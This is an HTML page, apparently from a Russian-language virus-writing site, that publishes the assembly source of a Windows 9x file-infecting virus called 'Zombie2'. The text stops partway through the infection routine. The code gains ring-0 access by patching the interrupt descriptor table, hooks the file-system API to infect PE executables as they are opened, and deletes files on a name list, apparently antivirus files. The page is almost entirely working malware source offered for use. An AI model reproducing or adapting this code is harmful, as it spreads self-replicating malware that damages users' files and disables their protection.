<html><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=FrontPage.Editor.Document><title>bablo</title></head><body><p><b><font size=5>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&#1042;&#1080;&#1088;&#1091;&#1089; Zombie2</font></b><p style="MARGIN: 0px; WORD-SPACING: 0px; TEXT-INDENT: 0px; LINE-HEIGHT: 150%">&nbsp;
<p><font face="Verdana" size="2">&#1042;&#1086;&#1090;
&#1089;&#1088;&#1072;&#1079;&#1091; &#1074;&#1072;&#1084;
&#1080;&#1089;&#1093;&#1086;&#1076;&#1085;&#1080;&#1082;
&#1087;&#1077;&#1088;&#1077;&#1074;&#1086;&#1076;&#1080;&#1090;&#1077;
&#1089;&#1072;&#1084;&#1080;<br>
------------------------------------------------------------------------------<br>
<br>
<br>
;DEBUG equ YEZ ; infect only .z0m files&amp;dont kill av<br>
<br>
vir_size_infile equ (((vir_size)*5/2+4095) and (not 4095))<br>
<br>
IFSMGR_Ring0_FileIO equ 000400032h<br>
<br>
R0_OPENCREATFILE equ 0D500h ; Open/Create a file<br>
R0_OPENCREAT_IN_CONTEXT equ 0D501h ; Open/Create file in current context<br>
R0_READFILE equ 0D600h ; Read a file, no context<br>
R0_WRITEFILE equ 0D601h ; Write to a file, no context<br>
R0_READFILE_IN_CONTEXT equ 0D602h ; Read a file, in thread context<br>
R0_WRITEFILE_IN_CONTEXT equ 0D603h ; Write to a file, in thread context<br>
R0_CLOSEFILE equ 0D700h ; Close a file<br>
R0_GETFILESIZE equ 0D800h ; Get size of a file<br>
R0_FINDFIRSTFILE equ 04E00h ; Do a LFN FindFirst operation<br>
R0_FINDNEXTFILE equ 04F00h ; Do a LFN FindNext operation<br>
R0_FINDCLOSEFILE equ 0DC00h ; Do a LFN FindClose operation<br>
R0_FILEATTRIBUTES equ 04300h ; Get/Set Attributes of a file<br>
GET_ATTRIBUTES equ 00h<br>
SET_ATTRIBUTES equ 01h<br>
R0_RENAMEFILE equ 05600h ; Rename a file<br>
R0_DELETEFILE equ 04100h ; Delete a file<br>
R0_LOCKFILE equ 05C00h ; Lock/Unlock a region in a file<br>
R0_GETDISKFREESPACE equ 03600h ; Get disk free space<br>
R0_READABSOLUTEDISK equ 0DD00h ; Absolute disk read<br>
R0_WRITEABSOLUTEDISK equ 0DE00h ; Absolute disk write<br>
<br>
<br>
dta_struc struc<br>
dta_fileattr dd ?<br>
dta_time_creation dq ?<br>
dta_time_lastaccess dq ?<br>
dta_time_lastwrite dq ?<br>
dta_filesize_hi dd ?<br>
dta_filesize dd ?<br>
dta_reserved_0 dd ?<br>
dta_reserved_1 dd ?<br>
dta_filename db 260 dup (?)<br>
dta_filename_short db 14 dup (?)<br>
ends<br>
<br>
mz_struc struc<br>
mz_id dw ? ; MZ/ZM<br>
mz_last512 dw ?<br>
mz_num512 dw ?<br>
mz_relnum dw ?<br>
mz_hdrsize dw ? ; in PAR<br>
mz_minmem dw ?<br>
mz_maxmem dw ?<br>
mz_ss dw ?<br>
mz_sp dw ?<br>
mz_csum dw ? ; 0<br>
mz_ip dw ?<br>
mz_cs dw ?<br>
mz_relofs dw ?<br>
mz_ovrnum dw ? ; 0<br>
db 32 dup (?)<br>
mz_neptr dd ?<br>
ends<br>
<br>
pe_struc struc<br>
pe_id dd ? ; 00 01 02 03 pe00<br>
pe_cputype dw ? ; 04 05 14c..14e: i386..i586<br>
pe_numofobjects dw ? ; 06 07<br>
pe_datetime dd ? ; 08 09 0a 0b date/time<br>
pe_cofftableptr dd ? ; 0c 0d 0e 0f<br>
pe_cofftablesize dd ? ; 10 11 12 13<br>
pe_ntheadersize dw ? ; 14 15<br>
pe_exe_flags dw ? ; 16 17<br>
; ntheader<br>
pe_ntheader_id dw ? ; 18 19<br>
pe_linkmajor db ? ; 19<br>
pe_linkminor db ? ; 1a<br>
pe_sizeofcode dd ? ; 1c 1d 1e 1f<br>
pe_sizeofinitdata dd ? ; 20 21 22 23<br>
pe_sizeofuninitdata dd ? ; 24 25 26 27<br>
pe_entrypointrva dd ? ; 28 29 2a 2b<br>
pe_baseofcoderva dd ? ; 2c 2d 2e 2f<br>
pe_baseofdatarva dd ? ; 30 31 32 33<br>
pe_imagebase dd ? ; 34 35 36 37 align: 64k<br>
pe_objectalign dd ? ; 39 30 3a 3b 256n &gt; power2 &gt; 512<br>
pe_filealign dd ? ; 3c 3d 3e 3f 64k &gt; power2 &gt; 512<br>
pe_osmajor dw ? ; 40 41<br>
pe_osminor dw ? ; 42 43<br>
pe_usermajor dw ? ; 44 45<br>
pe_userminor dw ? ; 46 47<br>
pe_subsysmajor dw ? ; 48 49<br>
pe_subsysminor dw ? ; 4a 4b<br>
dd ? ; 4c 4d 4e 4f<br>
pe_imagesize dd ? ; 50 51 52 53 align: objectalign<br>
pe_headersize dd ? ; 54 55 56 57 dosh+peh+objecttable<br>
pe_checksum dd ? ; 58 59 5a 5b 0<br>
pe_subsystem dw ? ; 5c 5d<br>
pe_dllflags dw ? ; 5e 5f<br>
pe_stackreservesize dd ? ; 60 61 62 63<br>
pe_stackcommitsize dd ? ; 64 65 66 67<br>
pe_heapreservesize dd ? ; 68 69 6a 6b<br>
pe_heapcommitsize dd ? ; 6c 6d 6e 6f<br>
pe_loaderflags dd ? ; 70 71 72 73<br>
pe_numofrvaandsizes dd ? ; 74 75 76 77 =10h<br>
; rva/sizes<br>
pe_rvasizes label dword<br>
pe_exporttablerva dd ? ; 78 79 7a 7b<br>
pe_exporttablesize dd ? ; 7c 7d 7e 7f<br>
pe_importtablerva dd ? ; 80 81 82 83<br>
pe_importtablesize dd ? ; 84 85 86 87<br>
pe_resourcetablerva dd ? ; 88 89 8a 8b<br>
pe_resourcetablesize dd ? ; 8c 8d 8e 8f<br>
pe_exceptiontablerva dd ? ; 90 91 92 93<br>
pe_exceptiontablesize dd ? ; 94 95 96 97<br>
pe_securitytablerva dd ? ; 98 99 9a 9b<br>
pe_securitytablesize dd ? ; 9c 9d 9e 9f<br>
pe_fixuptablerva dd ? ; a0 a1 a2 a3<br>
pe_fixuptablesize dd ? ; a4 a5 a6 a7<br>
pe_debugtablerva dd ? ; a8 a9 aa ab<br>
pe_debugtablesize dd ? ; ac ad ae af<br>
pe_imgdescrrva dd ? ; b0 b1 b2 b3<br>
pe_imgdescrsize dd ? ; b4 b5 b6 b7<br>
pe_machinerva dd ? ; b8 b9 ba bb<br>
pe_machinesize dd ? ; bc bd be bf<br>
pe_tlsrva dd ? ; c0 c1 c2 c3<br>
pe_tlssize dd ? ; c4 c5 c6 c7<br>
pe_loadcfgrva dd ? ; c8 c9 ca cb<br>
pe_loadcfgsize dd ? ; cc cd ce cf<br>
dq ? ; d0 d1 d2 d3 d4 d5 d6 d7<br>
pe_iattablerva dd ? ; d8 d9 da db<br>
pe_iattablesize dd ? ; dc dd de df<br>
dq ? ; e0 e1 e2 e3 d4 e5 e6 e7<br>
dq ? ; e8 e9 ea eb ec ed ee ef<br>
dq ? ; f0 f1 f2 f3 f4 f5 f6 f7<br>
ends<br>
<br>
oe_struc struc<br>
oe_section_name db 8 dup (?);00 01 02 03 04 05 06 07<br>
oe_virt_size dd ? ; 08 09 0a 0b<br>
oe_virt_rva dd ? ; 0c 0d 0e 0f align: objectalign<br>
oe_phys_size dd ? ; 10 11 12 13<br>
oe_phys_offs dd ? ; 14 15 16 17 align: filealign<br>
db 12 dup (?);for obj file<br>
oe_section_flags dd ? ; 24 25 26 27<br>
ends<br>
<br>
VxDcall macro Service<br>
db 0CDh<br>
db 020h<br>
dd Service<br>
endm<br>
<br>
VMMcall macro Service<br>
VxDcall VMM&amp;Service&amp;<br>
endm<br>
<br>
p386<br>
model flat<br>
<br>
locals __<br>
jumps<br>
<br>
.code<br>
<br>
start:<br>
db 0b8h<br>
@@kbase dd 0<br>
<br>
replace_start:<br>
mov ecx, [esp+eax]<br>
mov eax, [esp+eax+4]<br>
<br>
push ebp<br>
<br>
sub esp, size sdata / 2 - 4<br>
push eax<br>
sub esp, size sdata / 2<br>
<br>
mov ebp, esp<br>
cld<br>
<br>
sdata struc<br>
kernel_ptr_r3 dd ?<br>
dllbase dd ?<br>
idtr label fword<br>
idt_limit dw ?<br>
idt_base dd ?<br>
idt_entry_saved dq ?<br>
r3_vir_copy db vir_size dup (?)<br>
db 10 dup (?)<br>
align 16<br>
ends<br>
<br>
mov dllbase[esp], eax<br>
<br>
and ecx, 0FFFF0000h<br>
add ecx, 65536<br>
__again: sub ecx, 65536<br>
cmp word ptr [ecx], 'ZM'<br>
jne __again<br>
mov kernel_ptr_r3[esp], ecx<br>
<br>
x equ &lt;[ebp]-401000h&gt;<br>
y equ &lt;+(vir_copy-start)&gt;<br>
<br>
pusha<br>
call get_base_ebp<br>
cmp @@vir_type x, 1<br>
jne __skip<br>
mov esi, @@orig_rva x<br>
add esi, @@imagebase x<br>
mov ecx, vir_size_infile/4<br>
rep lodsd<br>
mov esi, @@vir_rva x<br>
add esi, @@imagebase x<br>
mov ecx, vir_size_infile/4<br>
rep lodsd<br>
__skip: popa<br>
<br>
call get_base_eax<br>
xchg esi, eax<br>
lea edi, r3_vir_copy[esp]<br>
mov ecx, vir_size<br>
rep movsb<br>
<br>
sidt idtr[esp]<br>
<br>
mov esi, idt_base[esp]<br>
add esi, 0Dh*8<br>
<br>
lea edi, idt_entry_saved[esp]<br>
<br>
push esi<br>
push edi<br>
<br>
movsd<br>
movsd<br>
<br>
pop esi<br>
pop edi<br>
<br>
; 2 2 2 2 2 1 1 1 1 1 1 1 1 1 1<br>
;31 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 0<br>
;------------------------------------------------------------------<br>
;| | | D | | | |<br>
;| RESERVED |P| P |0 1 1 1 0|0 0 0| RESERVED | +4<br>
;| | | L | | | |<br>
;|----------------------------------------------------------------|<br>
;| SEGMENT SELECTOR | OFFSET 15:00 | +0<br>
;------------------------------------------------------------------<br>
<br>
; P 1 segment present<br>
; DPL 11 ring 3<br>
; 01110 const<br>
<br>
c_idt_desc_offs equ int0D - start<br>
c_idt_desc_selector equ 28h<br>
c_idt_desc_type equ 1110111000000000b ; P=1 DPL=3 01110=CONST<br>
<br>
; dw c_idt_desc_offs and 65535<br>
; dw c_idt_desc_selector<br>
; dw c_idt_desc_type<br>
; dw c_idt_desc_offs shr 16<br>
<br>
mov ecx, 100000 ; to avoid fuckup because of<br>
__wait: in al, 80h ; twice-patched IDT<br>
cmp al, 88h<br>
loope __wait<br>
mov al, 88h<br>
out 80h, al<br>
<br>
pusha<br>
call get_base_eax<br>
add eax, c_idt_desc_offs<br>
stosw<br>
shld ebx, eax, 16<br>
mov ax, c_idt_desc_selector<br>
stosw<br>
mov ax, c_idt_desc_type<br>
stosw<br>
xchg ebx, eax<br>
stosw<br>
popa<br>
<br>
int 0Dh<br>
<br>
add esp, size sdata<br>
pop ebp<br>
ret<br>
<br>
naebka_1: jnc naebka_2<br>
call naebka_4<br>
<br>
back_from_r0: add esp, size sdata<br>
pop ebp<br>
jmp eax<br>
<br>
int0D: movsd<br>
movsd<br>
<br>
mov al, 0FFh<br>
out 80h, al<br>
<br>
call vx_init<br>
<br>
cli<br>
<br>
push ebp<br>
mov edx, kernel_ptr_r3[ebp]<br>
<br>
call get_base_ebp<br>
<br>
PC_WRITEABLE equ 00020000H<br>
PC_USER equ 00040000H<br>
PC_STATIC equ 20000000H<br>
<br>
VMM_PageModifyPermissions equ 000010133h<br>
<br>
cmp @@vir_type x, 1<br>
jne __skip_1<br>
<br>
xx_offs equ 50h<br>
add edx, xx_offs<br>
<br>
push [edx].dword ptr 0<br>
push [edx].dword ptr 4<br>
push edx<br>
<br>
lea esi, __vxd_ret x<br>
<br>
push PC_WRITEABLE+PC_STATIC+PC_USER ; OR_MASK<br>
push 0 ; AND_MASK<br>
push @@codesect_pagecount x<br>
push @@codesect_pageaddr12 x<br>
; VMMcall _PageModifyPermissions<br>
<br>
mov [edx].word ptr 0, 20CDh<br>
mov [edx].dword ptr 2, VMM_PageModifyPermissions<br>
mov [edx].word ptr 6, 0E6FFh ; jmp esi<br>
jmp edx<br>
__vxd_ret:<br>
add esp, 4*4<br>
<br>
cli<br>
<br>
pop edx<br>
pop [edx].dword ptr 4<br>
pop [edx].dword ptr 0<br>
<br>
test @@codesect_flags x, 80000000h<br>
jnz __go<br>
<br>
push PC_STATIC+PC_USER ; OR_MASK<br>
push not PC_WRITEABLE ; AND_MASK<br>
push @@codesect_pagecount x<br>
push @@codesect_pageaddr12 x<br>
VMMcall _PageModifyPermissions<br>
add esp, 4*4<br>
<br>
cli<br>
__go:<br>
<br>
__skip_1:<br>
<br>
pop ebp<br>
push ebp<br>
<br>
call ring0_code<br>
<br>
cli<br>
<br>
pop ebp<br>
<br>
lea eax, r3_vir_copy[ebp]<br>
add eax, __r3stack - start<br>
jmp eax<br>
<br>
__r3stack: mov ecx, dllbase[ebp]<br>
<br>
call get_base_ebp<br>
<br>
mov ebx, @@imagebase x<br>
<br>
cmp @@vir_type x, 1<br>
jne __skip_2<br>
<br>
mov edx, @@decr_key x<br>
<br>
mov esi, @@orig_rva x<br>
mov edi, @@vir_rva x<br>
add esi, ebx<br>
add edi, ebx<br>
<br>
push ecx<br>
mov ecx, vir_size_infile / 4<br>
cld<br>
<br>
; in al, 61h<br>
; or al, 3<br>
; out 61h, al<br>
<br>
__decr_1: lodsd<br>
<br>
sub eax, edx<br>
stosd<br>
<br>
rol edx, 13<br>
dec edx<br>
<br>
loop __decr_1<br>
<br>
; in al, 61h<br>
; and al, not 3<br>
; out 61h, al<br>
<br>
pop ecx<br>
<br>
__skip_2:<br>
cmp @@vir_type x, 0<br>
je __iret<br>
cmp @@vir_type x, 2<br>
je __mmm2<br>
<br>
__back: lea eax, back_from_r0 x<br>
mov [esp], eax ; INT stack frame-&gt;EIP<br>
<br>
mov eax, @@saveeip x ; eax=return address<br>
add eax, ebx<br>
<br>
__iret: call vx_done<br>
<br>
iret<br>
<br>
__mmm2: cmp @@is_dll x, 1<br>
jne __back<br>
<br>
mov eax, @@saveeip x<br>
add eax, ecx<br>
<br>
lea ecx, back_from_r0_dll x<br>
mov [esp], ecx<br>
<br>
mov edx, @@kbase x<br>
<br>
call vx_done<br>
<br>
iret<br>
<br>
naebka_3: jc naebka_4<br>
<br>
back_from_r0_dll: add esp, size sdata<br>
pop ebp<br>
<br>
add esp, edx<br>
<br>
or eax, eax<br>
jz __eax_0<br>
<br>
jmp eax<br>
<br>
__eax_0: mov eax, 1<br>
retn 0ch<br>
<br>
VMM_Begin_Critical_Section equ 00001001Fh<br>
VMM_End_Critical_Section equ 000010020h<br>
<br>
vx_init: pusha<br>
mov ecx, 110111b<br>
VMMcall _Begin_Critical_Section<br>
popa<br>
ret<br>
<br>
vx_done: pusha<br>
VMMcall _End_Critical_Section<br>
popa<br>
ret<br>
<br>
id_offs equ 0040h<br>
id_byte equ 'Z'<br>
<br>
ring0_code: cli<br>
<br>
mov edx, kernel_ptr_r3[ebp]<br>
cmp byte ptr ds:[edx + id_offs], id_byte<br>
je __ret ; NC<br>
<br>
VMM_PageAllocate equ 000010053h<br>
PAGEZEROINIT equ 00000001h<br>
PAGEFIXED equ 00000008h<br>
PG_SYS equ 1<br>
<br>
push edx<br>
<br>
push PAGEFIXED + PAGEZEROINIT<br>
xor eax, eax<br>
push eax ; PhysAddr<br>
push eax ; maxPhys<br>
push eax ; minPhys<br>
push eax ; Align<br>
push eax ; handle of VM = 0 if PG_SYS<br>
push PG_SYS ; allocate memory in system area<br>
push virPages; nPages<br>
VMMcall _PageAllocate<br>
add esp, 8*4<br>
<br>
cli<br>
<br>
pop edx<br>
<br>
or eax, eax; error?<br>
jz __ret_error<br>
<br>
mov edi, eax ; pointer to new r0 location<br>
lea esi, r3_vir_copy[ebp]<br>
mov ecx, vir_size ; size of code<br>
rep movsb<br>
<br>
pusha<br>
push PC_STATIC ; OR_MASK<br>
push not (PC_WRITEABLE+PC_USER) ; AND_MASK<br>
push virPages<br>
shr eax, 12<br>
push eax<br>
VMMcall _PageModifyPermissions<br>
add esp, 4*4<br>
<br>
cli<br>
<br>
popa<br>
<br>
sub edi, vir_size - (__new_r0_loc - start)<br>
jmp edi<br>
<br>
__new_r0_loc: lea esi, r3_vir_copy[ebp]<br>
<br>
call get_base_ebp<br>
<br>
mov kernel_base x, edx<br>
<br>
lea edi, vir_copy x<br>
mov ecx, vir_size<br>
rep movsb<br>
<br>
mov byte ptr ds:[edx + id_offs], id_byte<br>
<br>
IFDEF DEBUG<br>
mov dword ptr ds:[edx + id_offs + 16], ebp<br>
ENDIF<br>
<br>
call xor_copy<br>
<br>
call hook_IFS<br>
call hook_faults<br>
<br>
cli<br>
<br>
call get_base_ebp<br>
sidt r0_idt x<br>
mov eax, dword ptr r0_idt x + 2<br>
add eax, eblo<br>
mov bx, [eax+01h*8-eblo].word ptr 6<br>
shl ebx, 16<br>
mov bx, [eax+01h*8-eblo].word ptr 0<br>
mov byte ptr [ebx], 0CFh<br>
mov bx, [eax+03h*8-eblo].word ptr 6<br>
shl ebx, 16<br>
mov bx, [eax+03h*8-eblo].word ptr 0<br>
mov byte ptr [ebx], 0CFh<br>
<br>
__ret: ret<br>
<br>
__ret_error:<br>
<br>
IFDEF DEBUG<br>
mov ecx, 10<br>
call debug_beep<br>
loop $-5<br>
ENDIF<br>
<br>
ret<br>
<br>
naebka_6: call naebka_7<br>
<br>
hook_IFS:<br>
<br>
IFSMGR_InstallFileSystemApiHook equ 000400067h<br>
<br>
lea eax, ifs_handler x<br>
push eax<br>
VxDcall IFSMGR_InstallFileSystemApiHook<br>
add esp, 1*4<br>
<br>
or eax, eax<br>
jz __ret<br>
<br>
mov oldhandler_ptr_ptr x, eax<br>
<br>
mov entered x, 0<br>
<br>
__ret: ret<br>
<br>
VMM_Hook_V86_Fault equ 00001007Fh<br>
VMM_Hook_PM_Fault equ 000010080h<br>
VMM_Hook_VMM_Fault equ 000010081h<br>
<br>
hook_faults:<br>
mov eax, 06h<br>
lea esi, fault_handler x<br>
VMMcall _Hook_PM_Fault<br>
mov fault_previous x, esi<br>
<br>
ret<br>
<br>
VMM_Allocate_GDT_Selector equ 000010076h<br>
VMM_VMMCreateThread equ 000010105h<br>
<br>
get_base_ebp: call $+5<br>
pop ebp<br>
sub ebp, offset $-1-start<br>
ret<br>
<br>
get_base_eax: call $+5<br>
pop eax<br>
sub eax, offset $-1-start<br>
ret<br>
<br>
naebka_5: jmp naebka_6<br>
<br>
Client_Reg_Struc struc<br>
Client_EDI dd ? ; client's EDI<br>
Client_ESI dd ? ; client's ESI<br>
Client_EBP dd ? ; client's EBP<br>
dd ? ; ESP when pusha instruction is executed<br>
Client_EBX dd ? ; client's EBX<br>
Client_EDX dd ? ; client's EDX<br>
Client_ECX dd ? ; client's ECX<br>
Client_EAX dd ? ; client's EAX<br>
Client_Error dd ? ; doubleword error code<br>
Client_EIP dd ? ; EIP<br>
Client_CS dw ?,? ; CS<br>
Client_EFlags dd ? ; EFLAGS<br>
Client_ESP dd ? ; ESP<br>
Client_SS dw ?,? ; SS<br>
Client_ES dw ?,? ; ES<br>
Client_DS dw ?,? ; DS<br>
Client_FS dw ?,? ; FS<br>
Client_GS dw ?,? ; GS<br>
Client_Alt_EIP dd ?<br>
Client_Alt_CS dw ?,?<br>
Client_Alt_EFlags dd ?<br>
Client_Alt_ESP dd ?<br>
Client_Alt_SS dw ?,?<br>
Client_Alt_ES dw ?,?<br>
Client_Alt_DS dw ?,?<br>
Client_Alt_FS dw ?,?<br>
Client_Alt_GS dw ?,?<br>
ends<br>
<br>
fault_handler: pushf<br>
push eax<br>
push esi<br>
<br>
; db 0FFh +0<br>
; db 0FFh +1<br>
; db ????Xxxx +2<br>
; dw OLD_DATA xor word(EIP) +3 +4<br>
; hi_word = X<br>
; dw ? +5 +6<br>
<br>
mov esi, [ebp].Client_EIP<br>
<br>
test esi, 0FFFF0000h<br>
jz __go_next_handler<br>
<br>
mov ax, [esi]<br>
<br>
cmp ax, 0FFFFh<br>
jne __go_next_handler<br>
<br>
<br>
IFDEF DEBUG<br>
call debug_beep<br>
ENDIF<br>
mov byte ptr [esi], 0E8h<br>
<br>
mov al, [esi+2]<br>
and ax, 1111b<br>
test al, 1000b<br>
jz __1<br>
or ax, 1111111111110000b<br>
__1: shl eax, 16<br>
mov ax, [esi+3]<br>
xor ax, si<br>
<br>
mov [esi+1], eax<br>
<br>
mov word ptr [esi+5], 0C483h<br>
<br>
__exit_handler: pop esi<br>
pop eax<br>
popf<br>
ret<br>
<br>
__go_next_handler: pop esi<br>
pop eax<br>
popf<br>
<br>
jmp go_prev_fault<br>
<br>
<br>
ifs_onstack_struc struc<br>
dd ? ; saved ebp<br>
dd ? ; return address<br>
dd ? ; the address of the FSD function that is to be called for this API<br>
_function dd ? ; the function that is being performed<br>
_drive dd ? ; the 1-based drive the operation is being performed on (-1 if UNC)<br>
dd ? ; the kind of resource the operation is being performed on<br>
_codepage dd ? ; the codepage that the user string was passed in on<br>
_ioreq_ptr dd ? ; pointer to IOREQ structure<br>
ends<br>
<br>
ifs_handler: push ebp<br>
<br>
call get_base_ebp<br>
<br>
x equ &lt;[ebp]-401000h&gt;<br>
<br>
cmp entered x, 0<br>
jne __quit<br>
inc entered x<br>
<br>
;;<br>
<br>
mov eax, [esp]._function<br>
<br>
IFSFN_OPEN equ 36<br>
IFSFN_RENAME equ 37<br>
IFSFN_FILEATTRIB equ 33<br>
<br>
cmp eax, IFSFN_OPEN<br>
je __my_func<br>
cmp eax, IFSFN_RENAME<br>
je __my_func<br>
cmp eax, IFSFN_FILEATTRIB<br>
je __my_func<br>
<br>
__exit: dec entered x<br>
<br>
__quit: pop ebp<br>
<br>
jmp go_old_ifs_handler<br>
<br>
<br>
__my_func: pusha<br>
<br>
lea edi, filename x<br>
cld ; !<br>
<br>
mov filename_ptr x, edi<br>
<br>
mov eax, [esp]._drive + 32<br>
<br>
cmp al, -1<br>
je __skip<br>
<br>
or al, al<br>
jz __skip_drive<br>
<br>
add al, 'A'-1<br>
<br>
cmp al, 'A'<br>
jl __skip<br>
cmp al, 'Z'<br>
jg __skip<br>
<br>
stosb<br>
mov al, ':'<br>
stosb<br>
<br>
__skip_drive:<br>
<br>
IFSMGR_UniToBCSPath equ 000400041h<br>
<br>
mov eax, [esp]._codepage+32 ; BCS_WANSI/BCS_OEM<br>
push eax<br>
push filename_size-1 ; max name length<br>
mov eax, [esp]._ioreq_ptr+ 8+ 32<br>
mov eax, [eax] + 0Ch ; filename<br>
add eax, 4 ; skip &quot;<br>
push eax ; uni-str<br>
push edi ; output-str<br>
VxDcall IFSMGR_UniToBCSPath<br>
add esp, 4*4<br>
<br>
mov byte ptr [edi+eax], 0<br>
<br>
call infect_file<br>
<br>
__skip: popa<br>
jmp __exit<br>
<br>
infect_file: pusha<br>
<br>
call get_base_ebp<br>
cld<br>
<br>
call xor_copy<br>
<br>
call replace_proc<br>
<br>
xor eax, eax ; |-))<br>
mov dr0, eax<br>
mov dr1, eax<br>
mov dr2, eax<br>
mov dr3, eax<br>
<br>
mov edx, filename_ptr x<br>
mov ecx, 1+2+4+32 ; hsra<br>
lea esi, dta x<br>
call ffindfirst<br>
jc __exit<br>
call ffindclose<br>
<br>
;;<br>
<br>
mov esi, filename_ptr x<br>
__5: inc esi<br>
cmp byte ptr [esi], 0<br>
jne __5<br>
__6: dec esi<br>
cmp byte ptr [esi], '\'<br>
jne __6<br>
inc esi<br>
<br>
lea edi, shortname x<br>
push edi<br>
mov ecx, short_name_len+short_ext_len<br>
mov al, 32<br>
rep stosb<br>
pop edi<br>
<br>
mov ecx, short_name_len<br>
__b: lodsb<br>
or al, al<br>
jz __a<br>
cmp al, '.'<br>
je __c<br>
or ecx, ecx<br>
jle __b<br>
stosb<br>
dec ecx<br>
jmp __b<br>
__c: lea edi, shortname x + short_name_len<br>
mov ecx, short_ext_len<br>
__d: lodsb<br>
or al, al<br>
jz __a<br>
stosb<br>
loop __d<br>
__a:<br>
<br>
;;<br>
<br>
lea esi, shortname x<br>
<br>
lea edi, kewl_names x<br>
call is_in_list<br>
jc __exit<br>
<br>
lea edi, suck_names x<br>
call is_in_list<br>
jnc __good_file<br>
<br>
IFNDEF DEBUG<br>
mov edx, filename_ptr x<br>
call fdelete<br>
ELSE<br>
nop<br>
ENDIF<br>
<br>
jmp __exit<br>
__good_file:<br>
;;<br>
<br>
IFDEF DEBUG<br>
mov edi, filename_ptr x<br>
mov ecx, filename_size<br>
xor al, al<br>
cld<br>
repnz scasb<br>
mov eax, [edi].dword ptr -5<br>
or eax, 20202000h<br>
cmp eax, 'm0z.'<br>
jne __exit<br>
ENDIF<br>
<br>
infect_minsize equ 16384 ; 16K<br>
infect_maxsize equ 100*1024*1024 ; 100M<br>
<br>
mov eax, dta.dta_filesize x<br>
cmp eax, infect_minsize<br>
jb __exit<br>
cmp eax, infect_maxsize<br>
ja __exit<br>
<br>
mov edx, filename_ptr x<br>
mov ecx, 32<br>
call fsetattr<br>
jc __exit<br>
<br>
mov edx, filename_ptr x<br>
call fopen<br>
jc __restattr<br>
mov filehandle x, eax<br>
<br>
lea edx, mz x<br>
mov ecx, size mz<br>
mov ebx, filehandle x<br>
xor esi, esi ; filepos<br>
call fread<br>
<br>
mov ax, mz.mz_id x<br>
cmp ax, 'ZM'<br>
jne __close<br>
<br>
cmp mz.mz_relnum x, 0<br>
je __1<br>
cmp mz.mz_relofs x, 40h<br>
jb __close<br>
<br>
__1: mov esi, mz.mz_neptr x<br>
<br>
lea edx, pe x<br>
mov ecx, size pe<br>
mov ebx, filehandle x<br>
call fread<br>
cmp ecx, size pe<br>
jne __close<br>
add esi, ecx<br>
<br>
cmp pe.pe_ntheadersize x, 0E0h<br>
jne __close<br>
<br>
cmp pe.pe_datetime x, 0<br>
je __close<br>
<br>
mov eax, pe.pe_entrypointrva x<br>
or eax, eax<br>
jz __close<br>
mov @@saveeip x y, eax<br>
<br>
mov @@is_dll x y, 1<br>
<br>
mov ax, pe.pe_exe_flags x<br>
test al, 2 ; executable<br>
jz __close<br>
test ah, 20h ; dll? 1=fixed<br>
jnz __method_2<br>
<br>
cmp pe.pe_dllflags x, 0<br>
jne __method_2<br>
<br>
; cmp pe.pe_imagebase x, 400000h<br>
; jne __close<br>
<br>
mov @@is_dll x y, 0<br>
<br>
<br>
;;<br>
<br>
movzx edi, pe.pe_numofobjects x<br>
__try_section: or edi, edi<br>
; jz __set_stamp<br>
jz __method_2<br>
<br>
mov oeV_ptr x, esi<br>
<br>
lea edx, oeV x<br>
mov ecx, size oe_struc<br>
mov ebx, filehandle x<br>
call fread<br>
cmp ecx, size oe_struc<br>
jne __close<br>
add esi, ecx<br>
<br>
mov eax, oeV.oe_section_flags x<br>
and eax, 60000020h ; read,exec,code<br>
cmp eax, 60000020h<br>
jne __nextsection<br>
<br>
mov eax, oeV.oe_virt_rva x ; eax=v.start RVA<br>
<br>
__restart: mov ebx, vir_size_infile<br>
cmp ebx, oeV.oe_phys_size x<br>
ja __nextsection<br>
add ebx, eax ; ebx=v.end RVA<br>
<br>
mov ecx, oeV.oe_virt_rva x<br>
add ecx, oeV.oe_phys_size x<br>
cmp ebx, ecx<br>
ja __nextsection<br>
<br>
mov ecx, pe.pe_numofrvaandsizes x<br>
<br>
__2: dec ecx<br>
js __offset_found<br>
<br>
cmp pe.pe_rvasizes[ecx*8+4] x, 0<br>
je __2<br>
mov edx, pe.pe_rvasizes[ecx*8+0] x<br>
cmp edx, ebx<br>
ja __2<br>
add edx, pe.pe_rvasizes[ecx*8+4] x<br>
cmp edx, eax<br>
jbe __2<br>
<br>
mov eax, edx<br>
jmp __restart<br>
<br>
__nextsection: dec edi<br>
jmp __try_section<br>
<br>
__offset_found: mov @@vir_rva x y, eax<br>
<br>
sub eax, oeV.oe_virt_rva x<br>
add eax, oeV.oe_phys_offs x<br>
mov @@vir_offset x y, eax<br>
<br>
mov eax, oeV.oe_virt_rva x<br>
add eax, pe.pe_imagebase x<br>
shr eax, 12<br>
mov @@codesect_pageaddr12 x y, eax<br>
<br>
mov eax, oeV.oe_virt_size x<br>
add eax, 4095<br>
shr eax, 12<br>
mov @@codesect_pagecount x y, eax<br>
<br>
mov eax, oeV.oe_section_flags x<br>
mov @@codesect_flags x y, eax<br>
<br>
; and oeV.oe_section_flags x, not 80000000h ; clear W<br>
btr oeV.oe_section_flags x, 15<br>
<br>
mov eax, pe.pe_imagebase x<br>
mov @@imagebase x y, eax<br>
<br>
;;<br>
<br>
call __read_last_sect<br>
<br>
mov eax, oeL.oe_virt_rva x<br>
add eax, oeL.oe_phys_size x<br>
mov @@orig_rva x y, eax<br>
<br>
mov eax, oeL.oe_phys_offs x<br>
add eax, oeL.oe_phys_size x<br>
mov @@orig_offs x y, eax<br>
<br>
sub eax, dta.dta_filesize x<br>
neg eax<br>
cmp eax, pe.pe_objectalign x<br>
ja __method_2<br>
<br>
mov eax, oeL.oe_phys_size x<br>
cmp eax, oeL.oe_virt_size x<br>
jbe __size_okey<br>
sub eax, oeL.oe_virt_size x<br>
cmp eax, vir_size_infile<br>
jae __method_2<br>
add oeL.oe_virt_size x, eax<br>
add pe.pe_imagesize x, eax<br>
__size_okey:<br>
<br>
<br>
add oeL.oe_phys_size x, vir_size_infile<br>
add oeL.oe_virt_size x, vir_size_infile<br>
add pe.pe_imagesize x, vir_size_infile<br>
<br>
lea edx, oeL x<br>
mov ecx, size oe_struc<br>
